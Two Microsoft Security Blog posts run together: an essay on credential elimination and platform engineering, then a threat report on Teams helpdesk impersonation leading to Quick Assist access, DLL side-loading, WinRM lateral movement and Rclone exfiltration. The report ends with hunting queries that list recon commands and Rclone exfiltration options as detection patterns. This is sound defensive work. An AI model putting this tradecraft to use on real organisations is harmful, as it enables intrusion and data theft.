When your infrastructure powers thousands of organizations and millions of users, security is not a feature. It is the foundation you build everything else upon. I’m the Deputy CISO for Microsoft Dynamics 365 and Microsoft Power Platform. You may know Dynamics 365 as a cloud-based suite of intelligent business applications that unify customer relationship management (CRM) and enterprise resource planning (ERP) capabilities to help organizations manage sales, customer service, finance, supply chain, and operations more effectively. Power Platform is a low-code suite of tools that empowers both technical and non-technical users to analyze data, build custom applications, automate workflows, and create intelligent virtual agents. It does this by connecting to various data sources through Microsoft Dataverse and integrating seamlessly with not only Dynamics 365 but Microsoft 365 as well.

What might be a little less obvious is that together, these two suites make up what is quite possibly the largest internal business group fully running on Azure at Microsoft. With such a large cloud footprint of our own, and as an important part of the broader Microsoft cloud offering, it’s highly important that we take our digital security seriously. We must remain vigilant against all manner of threats and align our defenses with Secure Future Initiative (SFI) and One Microsoft principles.

I could talk for quite some time about many aspects of security, but I want to focus in on a topic I see mentioned less often than it should: avoiding attacks of opportunity. These are attacks launched by individuals who find ways into systems adjacent to our domains and who move laterally into our space. Maybe they’re looking for our data itself, or maybe they want to use our space as a means locate the company’s crown jewels elsewhere.

To start with, I’d like to cover credential elimination, endpoint reduction, and identity controls. These are strong security practices that everyone can pick up right away. After that, I want to cover the benefits of platform engineering, which delivers some very important security advantages to organizations ready to take it on.

Credential elimination and the benefits of managed identities

Most attackers don’t break into your network. They log in with stolen credentials. While good password hygiene helps reduce this behavior, a more reliable solution is removing credentials from the system entirely. Internally, we rely on a simple principle: if a workload can authenticate without a secret, it should. In following this principle, we have redesigned standards, retired legacy patterns, and eliminated large classes of passwords, client secrets, and API keys across our environment. The fewer credentials that exist, the fewer there are to phish, guess, reuse, or leak.

In practice, credential elimination is predominantly a design choice. Workloads prove who they are without a shared secret. On Azure, the primary mechanisms we use to accomplish this are managed identities (workload identities issued by Microsoft Entra ID) and federated identity patterns that mint tokens just-in-time, with just-enough-access for a specific resource or scope. There’s nothing to store, rotate, accidentally commit to a repo, or forget to expire—which removes a significant portion of potential incident root causes tied to leaked or stale secrets.

Because so many organizations build on our platforms, eliminating secrets in our own infrastructure is just the beginning. We have lent significant focus to making credential-free patterns available end-to-end for customers too. Power Platform Managed Identity (PPMI) gives Power Platform components like Dataverse plugins and Power Automate a tenant-owned identity that authenticates to Azure resources using federated credentials instead of embedded passwords or client secrets. This reduces outages from expired secrets and unblocks makers who previously needed app registrations they didn’t have permission to create. And Microsoft Entra Agent ID treats AI agents, like those created in Copilot Studio, as first class identities so they can be inventoried, governed, and bound to a human sponsor for accountability.

Credential elimination pairs naturally with endpoint elimination, which is the process of reducing or removing public, inbound-reachable endpoints wherever possible. In Azure, when workloads authenticate using managed identities and call out to services, you can:

  • Front your data plane with private endpoints/private link, keeping services off the public internet.
  • Disable inbound administrative ports (RDP/SSH) in favor of brokered access like just-in-time, bastion, or serial console, and rely on service-to-service OAuth instead of IP-based allowlists.
  • Enforce least privileged access at the token level, minimizing the blast radius of misused tokens.

Together, these tactics result in fewer places for an opportunistic attacker to reach. By replacing secrets with managed identities and collapsing public surfaces, you remove the easiest paths in. There are no passwords to stuff, no shared API keys to reuse, and far fewer public surfaces to probe. Even when an attacker gets a foothold nearby, lateral movement is harder because there’s nothing reusable to log in with, and every agent/workload has a distinct, auditable identity you can shut down in seconds.

Platform engineering for security

Opportunistic attackers thrive on inconsistency. Every exception we grant, whether it’s “this team is special,” or “that pattern is fine just this once,” spawns a snowflake architecture with unique configs, unique libraries, and unique failure modes. At small scale, those choices feel harmless. At organizational scale, they can very likely multiply risk and slow incident response. To win long term, we make opinionated decisions centrally and remove room for interpretation, transforming “do the right thing” from advice to policy.

In practice, that means standardizing on common compute and communications, disallowing brittle patterns, and enforcing the same controls everywhere. When we do that, there are fewer places for misconfigurations to hide, and far fewer opportunities for a nearby compromise to pivot laterally into our environment.

Platform engineering delivers the most benefit at scale. I would estimate the most opportune time to take it on is when you reach 500 engineers. Start too early and you risk dampening healthy experimentation; start too late and migration, coordination, and cleanup get exponentially harder. The inflection point is when the cost of fragmentation overtakes the creative benefits of local team autonomy. That’s the moment to set paved paths, publish the guardrails, and commit to consistency.

What to line up before you flip the switch:

  • Paved paths worth choosing, including secure-by-default runtimes, libraries, and pipelines.
  • Policy-as-code that blocks deprecated patterns and enforces identity-based auth and networking.
  • Executive sponsorship to hold the line on exceptions and keep platform friction low enough that teams see the benefits of using it.

Once you’ve decided the time is right for platform engineering, the next question is “who shapes the platform and how do we make trade‑offs?” This is where security and architecture step in—not as blockers, but as partners in defining the paved paths.

Broadly speaking, product and feature teams tend to optimize for success. They want to add capabilities, integrate faster, and ship value. Platform engineering and security, on the other hand, largely focus on minimizing risk. They want to reduce dependencies, question complexity, and enforce patterns that scale safely. Here’s the important part: neither side is wrong. They’re just solving different problems. The key is finding a deliberate balance that satisfies everyone’s needs. You need enough flexibility for innovation within the right number of guardrails to prevent fragmentation and reduce your attack surface.

This mindset shift is critical because it reframes security from “the team that says no” to “the team that designs the defaults everyone can trust.” When security and platform engineering work together, the result is a foundation where controls are baked in rather than bolted on, and one where every service inherits the same protections by design.

I’ll use my own team’s process as an illustrative example of the process. We standardized compute through “core services,” the backbone our application teams use for execution and communications. The tradeoff is intentional: we get a bit less local flexibility for a lot more global safety and speed. When a new defense is needed, one team lands it in core services and over 450 services inherit it, without the need for a service-by-service campaign. That saves time, reduces duplication, and because the evidence is centralized at the platform level, it’s easier for us to both approve changes and demonstrate compliance. We applied the same approach to partitioning and disallowed patterns, to a common communication library (uniform auth, mTLS, retries, telemetry, and policy hooks), and to centralized resource management and telemetry.

Resilience, consistency, and fewer weak links

Credential elimination and platform engineering aren’t quick wins. They’re foundational moves that reshape how you can defend at scale. They demand long term coordination, but the payoff is resilience, consistency, and a dramatically smaller attack surface. Microsoft continues to innovate in this space as well.

Concerning identity, we have delivered PPMI so organizations can securely access their Azure resources without juggling secrets or certificates—and they can use either bring-your-own or platform-managed identities. Next, we’re moving to platform provisioned identities, which are automatically created for each service, partitioned at the cell level, and scoped to the minimum privileges the service needs. Together, these steps materially reduce blast radius if an attacker gains a foothold.

Standardization is the force multiplier for platform security. Because our core services enforce consistent patterns, one change in the platform can protect all of our 450+ services. This saves time, reduces duplication, makes it easier to approve changes, and helps us demonstrate compliance because evidence is centralized at the platform level. This same uniformity is also enabling agent driven automation to help services meet SFI goals at scale—work that would be impractical in a fragmented environment.

Underpinning all of this is the idea of paved paths: opinionated defaults that make the secure choice the easy choice. That’s how we turn security from a checklist into an enabler, and how we make attacks of opportunity far harder to pull off.

Microsoft
Deputy CISOs

To hear more from Microsoft Deputy CISOs, check out the OCISO blog series.

To stay on top of important security industry updates, explore resources specifically designed for CISOs, and learn best practices for improving your organization’s security posture, join the Microsoft CISO Digest distribution list.

Man with smile on face working with laptop

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Making opportunistic cyberattacks harder by design appeared first on Microsoft Security Blog.

Cross‑tenant helpdesk impersonation to data exfiltration: A human-operated intrusion playbook

Threat actors are initiating cross-tenant Microsoft Teams communications while impersonating IT or helpdesk personnel to socially engineer users into granting remote desktop access. After access is established through Quick Assist or similar remote support tools, attackers often execute trusted vendor-signed applications alongside attacker-supplied modules to enable malicious code execution.

This access pathway might be used to perform credential-backed lateral movement using native administrative protocols such as Windows Remote Management (WinRM), allowing threat actors to pivot toward high-value assets including domain controllers. In observed intrusions, follow-on commercial remote management software and data transfer utilities such as Rclone were used to expand access across the enterprise environment and stage business-relevant information for transfer to external cloud storage. This intrusion chain relies heavily on legitimate applications and administrative protocols, allowing threat actors to blend into expected enterprise activity during multiple intrusion phases.

Threat actors are increasingly abusing external Microsoft Teams collaboration to impersonate IT or helpdesk personnel and convince users to grant remote assistance access. From this initial foothold, attackers can leverage trusted tools and native administrative protocols to move laterally across the enterprise and stage sensitive data for exfiltration—often blending into routine IT support activity throughout the intrusion lifecycle. Microsoft Defender provides correlated visibility across identity, endpoint, and collaboration telemetry to help detect and disrupt this user‑initiated access pathway before it escalates into broader compromise.

Risk to enterprise environments

By abusing enterprise collaboration workflows instead of traditional email based phishing channels, attackers may initiate contact through applications such as Microsoft Teams in a way that appears consistent with routine IT support interactions.

Microsoft Teams applies multiple security controls at the point of first external contact – before any chat, call, or file exchange occurs – including external tenant labeling, Accept/Block prompts, message previews, and phishing indicators designed to help users assess risk prior to engagement. However, this attack chain relies on convincing users to bypass those warnings and voluntarily grant remote access through legitimate support tools. In observed intrusions, risk is introduced not by external messaging alone, but when a user approves follow on actions — such as launching a remote assistance session — that result in interactive system access.

In observed intrusions, risk is introduced not by external messaging alone, but when a user approves follow‑on actions — such as launching a remote assistance session — that result in interactive system access.

An approved external Teams interaction might enable threat actors to:

  • Establish credential-backed interactive system access 
  • Deploy trusted applications to execute attacker-controlled code 
  • Pivot toward identity and domain infrastructure using WinRM 
  • Deploy commercially available remote management tooling 
  • Stage sensitive business-relevant data for transfer to external cloud infrastructure 

In the campaign, lateral movement and follow-on tooling installation occurred shortly after initial access, increasing the risk of enterprise-wide persistence and targeted data exfiltration. As each environment is different and with potential handoff to different threat actors, stages might differ if not outright bypassed.

Figure 1: Attack chain.

Attack chain overview

Stage 1: Initial contact via Teams (T1566.003 Spearphishing via Service)

The intrusion begins with abuse of external collaboration features in Microsoft Teams, where an attacker operating from a separate tenant initiates contact while impersonating internal support personnel as a means to social engineer the user. This activity does not stem from a weakness in Microsoft Teams or its built‑in security protections. Instead, attackers abuse legitimate collaboration features by persuading users to override multiple, clearly presented security warnings, highlighting the broader challenge of defending against attacks driven by social engineering rather than technical exploitation.

Because interaction occurs within an enterprise collaboration platform rather than through traditional email‑based phishing vectors, it might bypass initial user skepticism associated with unsolicited external communication. Security features protecting Teams users are detailed here, for reference. It’s important to note that this attack relies on users willfully ignoring or overlooking security notices and other protection features.  The lure varies and might include “Microsoft Security Update”, “Spam Filter Update”, “Account Verification” but the objective is constant: convince the user to ignore warnings and external contact flags, launch a remote management session, and accept elevation. Voice phishing (vishing) is sometimes layered to increase trust or compliance if voice interactions don’t replace the messaging altogether.

Timing matters. We regularly see a “ChatCreated” event to indicate a first contact situation, followed by suspicious chats or vishing, remote management, and other events that commonly produce alerts to include mailbombing or URL click alerts. All of these can be correlated by account and chat thread information in your Defender hunting environment.

Teams security warnings:

External Accept/Block screens provide notice to users about First Contact events, which prompt the user to inspect the sender’s identity before accepting:

Figure 2: External Accept/Block screens.

Higher confidence warnings alert the user of spam or phishing attempts on first contact:

Figure 3: spam or phishing alert.

External warnings notify users that they are communicating with a tenant/organization other than their own and should be treated with scrutiny:

Figure 4: External warnings.

Message warnings alert the user on the risk in clicking the URL:

Figure 5: URL click warning.

Safe Links for time-of-click protection warns users when URLs from Teams chat messages are malicious:

Figure 6: time-of-click protection warning.

Zero-hour Auto Purge (ZAP) can remove messages that were flagged as malicious after they have been sent:

Figure 7: Removed malicious from ZAP.

It’s important to note that the attacker often does not send the URL over a Teams message. Instead, they will navigate to it while on the endpoint during a remote management session. Therefore, the best security is user education on understanding the importance of not ignoring external flags for new helpdesk contacts. See “User education” in the “Defend, harden, and educate (Controls to deploy now)” section for further advice.

Stage 2: Remote assistance foothold

With user consent obtained through social engineering, the attacker gains interactive control of the device using remote support tools such as Quick Assist. This access typically results in the launch of QuickAssist.exe, followed by the display of standard Windows elevation prompts through Consent.exe as the attacker is guided through approval steps.

Figure 8: Quick Assist Key Logs.

From the user’s perspective, the attacker  convinces them to open Quick Assist, enter a short key, the follow all prompts and approvals to grant access.

Figure 9 – Quick Assist Launch.

This step is often completed in under a minute. The urgency and interactivity are the signal: a remote‑assist process tree followed immediately by “cmd.exe” or PowerShell on the same desktop.

Stage 3: Interactive reconnaissance and access validation

Immediately after establishing control through Quick Assist, the attacker typically spends the first 30–120 seconds assessing their level of access and understanding the compromised environment. This is often reflected by a brief surge of cmd.exe activity, used to verify user context and privilege levels, gather basic system information such as host identity and operating system details, and confirm domain affiliation. In parallel, the attacker might query registry values to determine OS build and edition, while also performing quick network reconnaissance to evaluate connectivity, reachability, and potential opportunities for lateral movement.

Figure 10: Enumeration.

On systems with limited privileges—such as kiosks, VDI, or non-corp-joined devices—actors might pause without deploying payloads, leaving only brief reconnaissance activity. They often return later when access improves or pivot to other targets within the same tenant.

Stage 4: Payload placement and trusted application invocation

Once remote access is established, the intrusion transitions from user‑assisted interaction to preparing the environment for persistent execution. At this point, attackers introduce a small staging bundle onto disk using either archive‑based deployment or short‑lived scripting activity. As activity moves beyond initial social engineering, Microsoft security protections shift from user‑facing warnings to behavior‑based detection, correlation, and automated response across identity, endpoint, and network layers.

After access is established, attackers stage payloads in locations such as ProgramData and execute them using DLL side‑loading through trusted signed applications. This includes:

  • AcroServicesUpdater2_x64.exe loading a staged msi.dll
  • ADNotificationManager.exe loading vcruntime140_1.dll
  • DlpUserAgent.exe loading mpclient.dll
  • werfault.exe loading Faultrep.dll

Allowing attacker‑supplied modules to run under a trusted execution context from non‑standard paths.

Figure 11: Sample Payload.

Stage 5: Execution context validation and registry backed loader state

Following payload delivery, the attacker performs runtime checks to validate host conditions before execution. A large encoded value is then written to a user‑context registry location, serving as a staging container for encrypted configuration data to be retrieved later at runtime.

Figure 12: Representative commands / actions (sanitized).

In this stage, a sideloaded module acting as an intermediary loader decrypts staged registry data in memory to reconstruct execution and C2 configuration without writing files to disk. This behavior aligns with intrusion frameworks such as Havoc, which externalize encrypted configuration to registry storage, allowing trusted sideloaded components to dynamically recover execution context and maintain operational continuity across restarts or remediation events.

Microsoft Defender for Endpoint may detect this activity as:

  • Unexpected DLL load by trusted application
  • Service‑path execution outside vendor installation directory
  • Execution from user‑writable directories such as ProgramData

Attack surface reduction rules and Windows Defender Application Control policies can be used to restrict execution pathways commonly leveraged for sideloaded module activation.

Stage 6: Command and control

Following successful execution of the sideloaded component, the updater‑themed process AcroServicesUpdater2_x64.exe began initiating outbound HTTPS connections over TCP port 443 to externally hosted infrastructure.

Unlike expected application update workflows which are typically restricted to known vendor services these connections were directed toward dynamically hosted cloud‑backed endpoints and unknown external domains. This behavior indicates remote attacker‑controlled infrastructure rather than legitimate update mechanisms.

Establishing outbound encrypted communications in this manner enables compromised processes to operate as beaconing implants, allowing adversaries to remotely retrieve instructions and maintain control within the affected environment while blending command traffic into routine HTTPS activity. The use of cloud‑hosted hosting layers further reduces infrastructure visibility and improves the attacker’s ability to modify or rotate communication endpoints without altering the deployed payload.

This activity marks the transition from local execution to externally directed command‑and‑control — enabling subsequent stages of discovery and movement inside the enterprise network.

Stage 7: Internal discovery and lateral movement toward high value assets

Shortly after external communications were established, the compromised process began initiating internal remote management connections over WinRM (TCP 5985) toward additional domain‑joined systems within the enterprise environment.

Microsoft Defender may surface these activities as multi‑device incidents reflecting credential‑backed lateral movement initiated from a user‑context remote session.

Analysis of WinRM activity indicates that the threat actor used native Windows remote execution to pivot from the initially compromised endpoint toward high‑value infrastructure assets, including identity and domain management systems such as domain controllers. Use of WinRM from a non‑administrative application suggests credential‑backed lateral movement directed by an external operator, enabling remote command execution, interaction with domain infrastructure, and deployment of additional tooling onto targeted hosts.

Targeting identity‑centric infrastructure at this stage reflects a shift from initial foothold to broader enterprise control and persistence. Notably, this internal pivot preceded the remote deployment of additional access tooling in later stages, indicating that attacker‑controlled WinRM sessions were subsequently leveraged to extend sustained access across

Protocol: “HTTP”
Entity Type: “IP”
Ip: <IP Address>
Target: “http://host.domain.local:5985/wsman”
RequestUserAgent: “Microsoft WinRM Client”

Stage 8: Remote deployment of auxiliary access tooling (Level RMM)

Subsequent activity revealed the remote installation of an additional management platform across compromised hosts using Windows Installer (msiexec.exe). This introduced an alternate control channel independent of the original intrusion components, reducing reliance on the initial implant and enabling sustained access through standard administrative mechanisms. As a result, attackers could maintain persistent remote control even if earlier payloads were disrupted or removed.

Stage 9: Data exfiltration

Actors used the file‑synchronization tool Rclone to transfer data from internal network locations to an external cloud storage service. File‑type exclusions in the transfer parameters suggest a targeted effort to exfiltrate business‑relevant documents while minimizing transfer size and detection risk.

Microsoft Defender might detect this activity as possible data exfiltration involving uncommon synchronization tooling.

Mitigation and protection guidance

Family / ProductProtectionReference documents
Microsoft TeamsReview external collaboration policies and ensure users receive clear external sender notifications when interacting with cross‑tenant contacts. Consider device‑ or identity‑based access requirements prior to granting remote support sessions.https://learn.microsoft.com/en-us/microsoftteams/trusted-organizations-external-meetings-chat and https://learn.microsoft.com/en-us/defender-office-365/mdo-support-teams-about
Microsoft Defender for Office 365Enable Safe Links for Teams conversations with time-of-click verification, and ensure zero-hour auto purge (ZAP) is active to retroactively quarantine weaponized messages.https://learn.microsoft.com/en-us/defender-office-365/safe-links-about
Microsoft Defender for EndpointDisable or restrict remote management tools to authorized roles, enable standard ASR rules in block mode, and apply WDAC to prevent DLL sideloading from ProgramData and AppData paths used by these actors.https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference
Microsoft Entra IDEnforce Conditional Access requiring MFA and compliant devices for administrative roles, restrict WinRM to authorized management workstations, and monitor for Rclone or similar synchronization utilities used for data exfiltration via hunting or custom alerts tuned to your environment.https://learn.microsoft.com/en-us/entra/identity/conditional-access/overview and https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-overview and https://learn.microsoft.com/en-us/defender-xdr/custom-detections-overview
Network ControlsEnable network protection to block implant C2 beaconing to poor-reputation and newly registered domains, and alert on registry modifications to ASEP locations by non-installer processes.  Hunting and custom detections tuned to your environment will assist in detecting network threats.https://learn.microsoft.com/en-us/defender-endpoint/network-protection
EducationThe attackers will often initiate Teams calls with their targets to talk them through completing actions that result in machine compromise. It may be useful to establish a verbal authentication code between IT Helpdesk and employees: a key phrase that an attacker is unlikely to know. Inform employees how IT Helpdesk would normally reach out to them: which medium(s) of communication? Email, Teams, Phone calls, etc. What identifiers would those IT Helpdesk contacts have? Domain names, aliases, phone numbers, etc. Show example images of your Helpdesk vs. an attacker impersonating them over your communication medium.  Show examples of how to identify external versus internal Teams communications, block screens, message and call reporting, as well as how to identify a display name vs. the real caller’s name and domain.  Inform employees that URLs shared by an external Helpdesk account leading to Safe Links warnings about malicious websites are extremely suspicious. They should report the message as phish and contact your security team.   If they receive any URLs from IT Helpdesk that involve going to a webpage for security updates or spam mailbox cleanings, then they should report that to your security team.  Treat unsolicited and unexpected external contact from IT Helpdesk as inherently suspicious.Disrupting threats targeting Microsoft Teams | Microsoft Security Blog

Microsoft protection outcomes

Family / ProductProtection in addition to detections.Reference Documents
AI driven detection & attack disruptionWhen Defender detects credential‑backed WinRM lateral movement following a Quick Assist session, Automatic Attack Disruption can suspend the originating user session and contain the users prior to domain‑controller interaction  — limiting lateral movement before your SOC engages. Look for incidents tagged “Attack Disruption” in your queue.https://learn.microsoft.com/en-us/defender-xdr/automatic-attack-disruption and https://learn.microsoft.com/en-us/defender-xdr/configure-attack-disruption
Cross-family / product incident correlationTeams/MDO, Entra ID, and MDE signals are automatically correlated into unified incidents. This entire attack chain surfaces as one multi-stage incident — not dozens of disconnected alerts. Review “Multi-stage” incidents for the full story.https://learn.microsoft.com/en-us/defender-xdr/incident-queue
Threat analytics and continuous tuningThreat analytics reports for these TTPs include exposure assessments and mitigations for your environment. Detection logic is continuously updated to reflect evolving tradecraft. Check your Threat Analytics dashboard for reports tagged to these Storm actors.https://learn.microsoft.com/en-us/defender-xdr/threat-analytics
Teams external message accept/block controlsWhen an external user initiates contact, Teams presents the recipient with a message preview and an explicit Accept or Block prompt before any conversation begins.  Blocking prevents future messages and hides your presence status from that sender.https://learn.microsoft.com/en-us/microsoftteams/teams-security-best-practices-for-safer-messaging
Security recommendationsFollowing security recommendations can help in improving the security posture of the org. Apply UAC restrictions to local accounts on network logonsSafe DLL Search ModeEnable Network ProtectionDisable ‘Allow Basic authentication’ for WinRM Client/Servicehttps://learn.microsoft.com/en-us/defender-vulnerability-management/tvm-security-recommendation

Microsoft Defender XDR detections

Microsoft Defender provides pre-breach and post-breach coverage for this campaign, supported by the  generic and specific alerts listed below.

TacticObserved activityMicrosoft Defender coverage
Initial AccessThe actor initiates a cross‑tenant Teams chat or call from an often newly created tenant using an IT/Help‑Desk personaMicrosoft Defender for Office 365 – Microsoft Teams chat initiated by a suspicious external user – IT Support Teams Voice phishing following mail bombing activity – A user clicked through to a potentially malicious URL. – A potentially malicious URL click was detected.  

Microsoft Defender for Endpoint – Possible initial access from an emerging threat
Execution The attacker gains interactive control via remote management tools to include Quick Assist.Microsoft Defender for Endpoint
– Suspicious activity using Quick Assist – Uncommon remote access software – Remote monitoring and management software suspicious activity

Microsoft Defender Antivirus
– Trojan:Win64/DllHijack.VGA!MTB – Trojan:Win64/DllHijack.VGB!MTB – Trojan:Win64/Tedy!MTB  – Trojan.Win64.Malgent  – Trojan:Win64/Zusy!MTB
Lateral MovementAttacker pivots via WinRM to target highvalue assets (e.g., domain controllers).Microsoft Defender for Endpoint
– Suspicious sign-in activity – Potential human-operated malicious activity – Hands-on-keyboard attack involving multiple devices
PersistenceRuntime environment validated and encoded loader state stored within user registry.Microsoft Defender for Endpoint
– Suspicious registry modification
Defense Evasion & Privilege EscalationDLL Side-Loading (e.g., AcroServicesUpdater2_x64.exe, ADNotificationManager.exe, or DlpUserAgent.exe)Microsoft Defender for Endpoint
– An executable file loaded an unexpected DLL file

Microsoft Defender Antivirus
– Trojan:Win64/DllHijack.VGA!MTB – Trojan:Win64/DllHijack.VGB!MTB – Trojan:Win64/Tedy!MTB  – Trojan.Win64.Malgent  – Trojan:Win64/Zusy!MTB
Command & ControlThe implant or sideloaded host typically beacons over HTTPSMicrosoft Defender for Endpoint
– Connection to a custom network indicator – A file or network connection related to a ransomware-linked emerging threat activity group detected
Data ExfiltrationWidely available file‑synchronization utility Rclone to systematically transfer dataMicrosoft Defender for Endpoint
– Possible data exfiltration
Multi-tacticMany alerts span across multiple tactics or stages of an attack and cover many platforms.Microsoft Defender (All) – Multi-stage incident involving Execution – Remote management event after suspected Microsoft Teams IT support phishing – An Office application ran suspicious commands

Hunting queries

Security teams can use the advanced hunting capabilities in Microsoft Defender XDR to proactively look for indicators of exploitation.

A. Teams → RMM correlation

let _timeFrame = 30m;
// Teams message signal 
let _teams =
    MessageEvents
    | where Timestamp > ago(14d)
    //| where SenderDisplayName contains "add keyword"
    //          or SenderDisplayName contains "add keyword"
    | extend Recipient = parse_json(RecipientDetails)
    | mv-expand Recipient
    | extend VictimAccountObjectId = tostring(Recipient.RecipientObjectId),
             VictimRecipientDisplayName = tostring(Recipient.RecipientDisplayName)
    | project
        TTime = Timestamp,
        SenderEmailAddress,
        SenderDisplayName,
        VictimRecipientDisplayName,
        VictimAccountObjectId;
// RMM launches on endpoint side
let _rmm =
    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName in~ ("QuickAssist.exe", "AnyDesk.exe", "TeamViewer.exe")
    | extend VictimAccountObjectId = tostring(InitiatingProcessAccountObjectId)
    | project
        DeviceName,
        QTime = Timestamp,
        RmmTool = FileName,
        VictimAccountObjectId;
_teams
| where isnotempty(VictimAccountObjectId)
| join kind=inner _rmm on VictimAccountObjectId
| where isnotempty(DeviceName)
| where QTime between ((TTime) .. (TTime +(_timeFrame)))
| project DeviceName, SenderEmailAddress, SenderDisplayName, VictimRecipientDisplayName, VictimAccountObjectId, TTime, QTime, RmmTool
| order by QTime desc

B. Execution

DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "cmd.exe"
| where FileName =~ "cmd.exe"
| where ProcessCommandLine has_all ("/S /D /c", "\" set /p=\"PK\"", "1>")

C. ZIP → ProgramData service path → signed host sideload

let _timeFrame = 10m;
let _armOrDevice =
    DeviceFileEvents
    | where Timestamp > ago(14d)
    | where FolderPath has_any (
        "C:\\ProgramData\\Adobe\\ARM\\", 
        "C:\\ProgramData\\Microsoft\\DeviceSync\\",
        "D:\\ProgramData\\Adobe\\ARM\\", 
        "D:\\ProgramData\\Microsoft\\DeviceSync\\")
      and ActionType in ("FileCreated","FileRenamed")
    | project DeviceName, First=Timestamp, FileName;
let _hostRun =
    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName in~ ("AcroServicesUpdater2_x64.exe","DlpUserAgent.exe","ADNotificationManager.exe")
    | project DeviceName, Run=Timestamp, Host=FileName;
_armOrDevice
| join kind=inner _hostRun on DeviceName
| where Run between (First .. (First+(_timeFrame)))
| summarize First=min(First), Run=min(Run), Files=make_set(FileName, 10) by DeviceName, Host
| order by Run desc

D. PowerShell → high‑risk TLD → writes %AppData%/Roaming EXE

let _timeFrame = 5m;
let _psNet = DeviceNetworkEvents
| where Timestamp > ago(14d)
| where InitiatingProcessFileName in~ ("powershell.exe","pwsh.exe")
| where RemoteUrl matches regex @"(?i)\.(top|xyz|zip|click)$"
| project DeviceName, NetTime=Timestamp, RemoteUrl, RemoteIP;
let _exeWrite = DeviceFileEvents
| where Timestamp > ago(14d)
| where FolderPath has @"\AppData\Roaming\" and FileName endswith ".exe"
| project DeviceName, WTime=Timestamp, FileName, FolderPath, SHA256;
_psNet
| join kind=inner _exeWrite on DeviceName
| where WTime between (NetTime .. (NetTime+(_timeFrame)))
| project DeviceName, NetTime, RemoteUrl, RemoteIP, WTime, FileName, FolderPath, SHA256
| order by WTime desc

E. Registry breadcrumbs / ASEP anomalies

DeviceRegistryEvents
| where Timestamp > ago(30d)
| where RegistryKey has @"\SOFTWARE\Classes\Local Settings\Software\Microsoft"
| where RegistryValueName in~ ("UCID","UFID","XJ01","XJ02","UXMP")
| project Timestamp, DeviceName, ActionType, RegistryKey, RegistryValueName, PreviousRegistryValueData, InitiatingProcessFileName
| order by Timestamp desc

F. Non‑browser process → API‑Gateway → internal AD protocols

let _timeFrame = 10m;
let _net1 =
    DeviceNetworkEvents
    | where Timestamp > ago(14d)
    | where RemoteUrl has ".execute-api."
    | where InitiatingProcessFileName !in~ ("chrome.exe","msedge.exe","firefox.exe")
    | project DeviceName,
              Proc=InitiatingProcessFileName,
              OutTime=Timestamp,
              RemoteUrl,
              RemoteIP;
let _net2 =
    DeviceNetworkEvents
    | where Timestamp > ago(14d)
    | where RemotePort in (135,389,445,636)
    | project DeviceName,
              Proc=InitiatingProcessFileName,
              InTime=Timestamp,
              RemoteIP,
              RemotePort;
_net1
| join kind=inner _net2 on DeviceName, Proc
| where InTime between (OutTime .. (OutTime+(_timeFrame)))
| project DeviceName, Proc, OutTime, RemoteUrl, InTime, RemotePort
| order by InTime desc

G. PowerShell history deletion

DeviceFileEvents
| where Timestamp > ago(14d)
| where FileName =~ "ConsoleHost_history.txt" and ActionType == "FileDeleted"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FolderPath
| order by Timestamp desc

H. Reconnaissance burst (cmd / PowerShell)

DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName in~ ("cmd.exe","powershell.exe","pwsh.exe")
| where ProcessCommandLine has_any (
    "whoami", "whoami /all", "whoami /groups", "whoami /priv",
    "hostname", "systeminfo", "ver", "wmic os get",
    "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
    "query user", "net user", "nltest", "ipconfig /all", "arp -a", "route print",
    "dir", "icacls"
)
| project Timestamp, DeviceName, FileName, InitiatingProcessFileName, ProcessCommandLine
| summarize eventCount = count(), FileNames = make_set(FileName), InitiatingProcessFileNames = make_set(InitiatingProcessFileName), ProcessCommandLines = make_set(ProcessCommandLine, 5) by DeviceName
| where eventCount > 2

I. Data Exfil

DeviceProcessEvents
| where Timestamp > ago(2d)
| where FileName =~ "rclone.exe" or ProcessVersionInfoOriginalFileName =~ "rclone.exe"
| where ProcessCommandLine has_all ("copy ", "--config rclone_uploader.conf", "--transfers 16", "--checkers 16", "--buffer-size 64M", "--max-age=3y", "--exclude *.mdf")

J. Quick Assist–anchored recon (no staging writes within 10 minutes)

let _reconWindow = 10m; // common within 1-5 minutes
let _stageWindow = 15m; // common 1-2 minutes after recon, or less
// Anchor on RMM 
let _rmm =
    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName in~ ("QuickAssist.exe", "AnyDesk.exe", "TeamViewer.exe")
    | project DeviceName, RMMTime=Timestamp;
// Recon commands within X minutes of RMM start (targeted list)
let _recon =
    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName in~ ("cmd.exe","powershell.exe","pwsh.exe")
    | where ProcessCommandLine has_any (
        "whoami", "hostname", "systeminfo", "ver", "wmic os get",
        "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
        "query user", "net user", "nltest", "ipconfig /all", "arp -a", "route print",
        "dir", "icacls"
    )
    | project DeviceName, ReconTime=Timestamp, ReconCmd=ProcessCommandLine, ReconProc=FileName;
// Suspect staging writes (ZIP/EXE/DLL)
let _staging =
    DeviceFileEvents
    | where Timestamp > ago(14d)
    | where ActionType in ("FileCreated","FileRenamed")
    | where FileName matches regex @"(?i).*\\.(zip|exe|dll)$"
    | project DeviceName, STime=Timestamp, StageFile=FileName, StagePath=FolderPath;
// Correlate RMM + recon, then exclude cases with staging writes in the next X minutes
let _rmmRecon =
    _rmm
    | join kind=inner _recon on DeviceName
    | where ReconTime between (RMMTime .. (RMMTime+(_reconWindow)))
    | project DeviceName, RMMTime, ReconTime, ReconProc, ReconCmd;
_rmmRecon
| join kind=leftouter _staging on DeviceName
| extend HasStagingInWindow = iff(STime between (RMMTime .. (RMMTime+(_stageWindow))), 1, 0)
| summarize HasStagingInWindow=max(HasStagingInWindow) by DeviceName, RMMTime, ReconTime, ReconProc, ReconCmd
| where HasStagingInWindow == 0
